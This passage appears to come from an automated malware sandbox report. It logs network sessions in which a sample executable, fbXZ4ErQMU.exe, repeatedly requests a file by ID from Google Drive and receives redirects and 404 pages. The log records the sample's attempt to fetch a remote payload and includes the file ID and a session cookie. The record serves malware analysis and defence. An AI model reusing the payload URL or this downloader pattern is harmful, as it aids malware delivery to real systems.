                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5Z-QIukitg_Etj8K5EQRQqD8Py4uWAIGJ7iazhkSELJ7OndcfAmYvMrF6O2vOSc8wYf16Lg0Xpqg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:04:54 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 31 50 6c 62 6d 2d 53 4d 74 74 66 6f 6d 45 4f 59 33 4a 49 72 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u1Plbm-SMttfomEOY3JIrQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.11.2049773142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:05:04 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:04 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:04 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce--B-NqRJw0DlRquRhX8j98A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.11.2049774142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:05:05 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:05 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:05 GMT
                                                        Content-Security-Policy: script-src 'nonce-mXI6D9fuzwTjOamT_f25Mw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5ha9xwpAGxrF9AObB47bH3WAIOg5Dd4kjUqHgAI8dpB3bPp8hJh8_xpLuWp-VySRfzavYgkXhgxg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:05:05 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 4e 44 79 32 78 30 45 57 43 4e 45 4e 59 4c 64 65 6e 39 33 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jNDy2x0EWCNENYLden93GQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.11.2049775142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:05:15 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:15 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:15 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-N6Q6yjkZpwbVK1Y-3gQSug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.11.2049776142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:05:16 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:16 UTC1846INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:16 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-7USCs70f41WRI35N-mWk4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC6qHkYESejmC0ulNAWyaT_t8XcQjCkB0xlVhRyBRpRN0R5KmXQ1crZPTUsJ3Heuv9hamg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:05:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 4b 77 31 33 72 6c 66 55 75 4f 73 6c 37 5a 79 48 43 55 49 4e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KKw13rlfUuOsl7ZyHCUINA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.11.2049777142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:05:26 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:27 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:27 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-Xxd1_eVdV_-6hJR3nZFR4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.11.2049778142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:05:27 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:27 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:27 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-1_3vcwjgMho-ygVstGkFxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC52Tl_ttFYP4gDCv83-FtwoQuinsDNQ3GdMzGFJXtSxcBWC159WHpfjYuwadzqPbCQwmc4QFe5gPA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:05:27 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 6c 4d 6b 50 79 66 58 50 61 64 42 34 67 35 53 44 6a 68 6b 61 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZlMkPyfXPadB4g5SDjhkaQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.11.2049779142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:05:38 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:38 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:38 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-c_OGKj0IwMgLBC15eilueg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
